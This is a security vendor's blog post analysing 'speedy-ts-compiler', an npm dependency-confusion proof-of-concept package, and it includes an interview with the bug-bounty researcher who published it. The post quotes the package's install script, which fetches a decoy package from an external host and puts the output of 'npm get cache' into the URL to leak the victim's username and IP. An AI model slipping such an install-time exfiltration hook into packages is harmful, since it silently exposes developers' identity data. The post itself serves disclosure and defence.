npm package downloads another package while exfiltrating your IP address and username

May 06, 2022 By Ax Sharma

5 minute read time

On any given day, Sonatype's security research team analyzes dozens to hundreds of suspicious packages published to open source registries including npm and PyPI.

Most of these packages end up being dependency confusion candidates or typosquatting malware.

But, this one—"speedy-ts-compiler" stood out to us.

The package in question was flagged by Sonatype's automated malware detection bots within a few hours of its publication to npm.

At a first glance, the component name "speedy-ts-compiler" with just one peculiar version, "100.0.2," combined with an empty README page on npm, raises red flags as to whether this was a suspicious package.

Interestingly, TypeStrong's official docs cite "speedy-ts-compiler" in places as an example of a hypothetical compiler (transpiler).

TypeScript Node

Downloads another npm package on install

When you take a look at what's going inside the package, the manifest file (package.json) begins to tell the full story.

At the install stage, "speedy-ts-compiler" runs a simple npm script:

npm install http://<external hostname>/tastytreats-1.0.0.tgz?yy=`npm get cache`

It may seem like, as soon as if, the npm package is installing another npm package "tastytreats" from an external URL. And that is true, to an extent.

But we noticed, "tastytreats-1.0.0.tgz" installed by "speedy-ts-compiler" was practically empty, with nothing but skeleton code within.

Why would any developer create a package—good or bad, that installs another empty package on your system?

The answer is, that it's merely a distraction tactic. The GET parameter "yy" present in the URL is essentially exfiltrating the path to your npm cache, retrieved via the 'npm get cache' command.

To the developer, this would effectively reveal your system's username. And the HTTP request itself reveals your IP address to the package's owner.

'Bloat free' distraction tactic for data exfiltration

Put simply, this is a dependency confusion attack but without the bloat.

Traditional dependency confusion packages seen by us previously have contained obvious code snippets that gather your system's IP address, username, and fingerprinting information and then upload this data via DNS or HTTP. But, "speedy-ts-compiler" does away with extra lines of code to accomplish nearly the same task.

The "index.js" within "speedy-ts-compiler" has the whereabouts of the author concealed with base64.

It turns out this is a proof-of-concept among hundreds published by the ethical hacker and bug bounty hunter, Ajay Kulal.

To better understand our findings, we reached out to Kulal who confirmed to Sonatype "speedy-ts-compiler" is a PoC created for bug bounty research and performs no outright malicious actions.

"It's the same dependency confusion attack, but I am not adding any malicious code. I just installed another non-malicious package so that I get the IP address of the system where this package gets installed," Kulal told Sonatype.

The researcher declined to name the company that was his target for ethical bug bounty research but mentioned that the test failed as Sonatype caught the package before the target did.

Kulal explains his motivation to leverage "npm get cache" comes from PoC packages repeatedly being taken down by OSS repos for containing code that may look suspicious.

"My packges got deleted [and over time I] kept improving the attack vector. In the beginning, I tried to obfuscate the payloads but that [didn't work]," says Kulal.

The researcher later attempted to host his PoC dependencies on GitHub but even those were taken down. And, this whack-a-mole game has been urging Kulal to find subtler but non-malicious ways of conducting ethical hacking that would "work for everyone."

 "This wasn't the only package though. I have ethically reported more than 100 dependency confusion issues so far," says the researcher.

Nexus Firewall users remain protected

Sonatype remains at the forefront of timely discoveries and reporting attacks targeting OSS developers.

Users of Nexus Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds. 

U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE

Nexus Firewall instances will automatically quarantine any suspicious components detected by our automated malware detection systems while a manual review by a researcher is in the works, thereby keeping your software supply chain protected from the start. 

Sonatype’s world-class security research data, combined with our automated malware detection technology safeguards your developers, customers, and software supply chain from infections.

Update Friday, May 6th, 07:07 AM ET: Redacted researcher's PoC server hostname upon request.

Tags: vulnerabilities, Nexus Firewall, featured, malware prevention, dependency confusion, DevZone

Written by Ax Sharma

Ax is a Security Researcher at Sonatype and Engineer who holds a passion for perpetual learning. His works and expert analyses have frequently been featured by leading media outlets. Ax's expertise lies in security vulnerability research, reverse engineering, and software development. In his spare time, he loves exploiting vulnerabilities ethically and educating a wide range of audiences.